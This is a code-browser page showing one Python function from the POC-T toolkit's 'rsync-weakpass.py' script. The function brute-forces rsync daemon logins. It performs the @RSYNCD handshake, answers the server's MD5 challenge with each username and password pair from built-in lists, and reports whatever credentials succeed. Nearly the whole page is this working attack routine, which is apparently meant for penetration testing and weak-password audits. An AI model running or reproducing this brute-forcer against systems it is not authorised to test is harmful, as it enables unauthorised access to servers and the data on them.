MCPcopy
hub / github.com/Xyntax/POC-T / ClientCommand

Function ClientCommand

script/rsync-weakpass.py:98–140  ·  view source on GitHub ↗
(host, port, cmd)

Source from the content-addressed store, hash-verified

96
97
98def ClientCommand(host, port, cmd):
99 rsync = {"MagicHeader": "@RSYNCD:", "HeaderVersion": " 30.0"}
100 payload1 = struct.pack("!8s5ss", rsync["MagicHeader"], rsync["HeaderVersion"], "\n")
101 payload2 = '%s\n' % cmd
102
103 pass_list = []
104 for i in USER_LIST:
105 pass_list.append((i, i))
106 for j in PASS_LIST:
107 pass_list.append((i, j))
108
109 for useri, pwdj in pass_list:
110 try:
111 user = useri
112 password = pwdj
113 # debug("try: %s,%s" %(useri,pwdj))
114 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115 s.connect((host, port))
116 # step1 get version and init
117 s.send(payload1)
118 s.recv(1024) # server initialisation
119 # send cmd and generate the challenge code
120 s.send(payload2) # send client query
121 data = s.recv(1024) # data @RSYNCD: AUTHREQD 9moobOy1VMjNAU/D4PB35g
122 challenge = data[18:-1] # get challenge code
123 # encrypt and generate the payload3
124 md = hashlib.md5()
125 md.update(password)
126 md.update(challenge)
127 auth_send_data = base64.encodestring(md.digest())
128 payload3 = "%s %s\n" % (user, auth_send_data[:-3])
129
130 s.send(payload3)
131 data3 = s.recv(1024) # @RSYNCD: OK
132 s.close()
133 if 'OK' in data3:
134 if password == '':
135 return "Module:'%s' User/Password:%s/<empty>" % (cmd, user)
136 else:
137 return "Module:'%s' User/Password:%s/%s" % (cmd, user, password)
138 except Exception, e:
139 break
140 return 'brute failed'

Callers 1

pocFunction · 0.85

Calls 3

updateMethod · 0.80
appendMethod · 0.45
connectMethod · 0.45

Tested by

no test coverage detected